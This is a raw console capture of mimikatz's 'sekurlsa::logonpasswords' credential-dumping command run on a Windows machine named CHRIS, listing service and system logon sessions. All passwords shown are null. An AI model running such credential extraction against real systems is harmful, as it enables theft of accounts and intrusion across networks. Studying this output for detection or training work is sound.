mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 106498 (00000000:0001a002)
Session           : Service from 0
User Name         : OracleVssWriterXE
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:59 AM
SID               : S-1-5-80-3850495238-697030721-643989029-4057494824-707097437
        msv :
        tspkg :
        wdigest :
         * Username : CHRIS$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 106481 (00000000:00019ff1)
Session           : Service from 0
User Name         : OracleServiceXE
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:59 AM
SID               : S-1-5-80-1464070106-3570761766-2172374724-783153558-1381522724
        msv :
        tspkg :
        wdigest :
         * Username : CHRIS$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 105986 (00000000:00019e02)
Session           : Service from 0
User Name         : OracleOraDB18Home1TNSListener
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:59 AM
SID               : S-1-5-80-3442054588-1278037219-818073466-3463126680-768032334
        msv :
        tspkg :
        wdigest :
         * Username : CHRIS$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : CHRIS$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:54 AM
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username : CHRIS$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : chris$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 32678 (00000000:00007fa6)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:53 AM
SID               : S-1-5-96-0-0
        msv :
        tspkg :
        wdigest :
         * Username : CHRIS$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 32660 (00000000:00007f94)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:53 AM
SID               : S-1-5-96-0-1
        msv :
        tspkg :
        wdigest :
         * Username : CHRIS$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 31827 (00000000:00007c53)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:53 AM
SID               :
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 105669 (00000000:00019cc5)
Session           : Service from 0
User Name         : OracleOraDB18Home1MTSRecoveryService
Domain            : NT SERVICE
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:59 AM
SID               : S-1-5-80-3918115038-295490193-4215755555-2765072535-2777281632
        msv :
        tspkg :
        wdigest :
         * Username : CHRIS$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:54 AM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 51206 (00000000:0000c806)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:54 AM
SID               : S-1-5-90-0-1
        msv :
        tspkg :
        wdigest :
         * Username : CHRIS$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 51157 (00000000:0000c7d5)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:54 AM
SID               : S-1-5-90-0-1
        msv :
        tspkg :
        wdigest :
         * Username : CHRIS$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : CHRIS$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 4/6/2021 8:03:53 AM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : CHRIS$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : chris$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

mimikatz #
